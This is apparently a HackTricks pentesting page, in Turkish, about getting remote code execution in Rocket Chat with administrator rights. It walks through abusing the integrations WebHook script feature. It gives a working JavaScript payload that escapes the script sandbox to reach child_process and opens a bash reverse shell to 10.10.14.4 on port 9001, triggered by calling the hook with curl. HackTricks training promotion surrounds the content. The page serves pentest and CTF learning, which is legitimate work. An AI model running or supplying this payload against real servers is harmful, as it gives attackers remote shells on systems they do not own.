HackTricksRocket Chat
Reading time: 2 minutes
tip
AWS Hacking'i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
RCE
Eğer Rocket Chat içinde admin iseniz RCE elde edebilirsiniz.
Integrationsbölümüne gidin veNew Integrationseçeneğini seçin, ardından herhangi birini seçin:Incoming WebHookveyaOutgoing WebHook./admin/integrations/incoming
.png)
- docs sayfasına göre, her ikisi de verileri işlemek için ES2015 / ECMAScript 6 (temelde JavaScript) kullanır. O yüzden bir rev shell for javascript alalım:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- WebHook'u yapılandırın (kanal ve kullanıcı adı olarak gönderi mevcut olmalıdır):
.png)
- WebHook betiğini yapılandırın:
.png)
- Değişiklikleri kaydedin
- Oluşturulan WebHook URL'sini alın:
.png)
- curl ile çağırın ve rev shell almanız gerekir
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.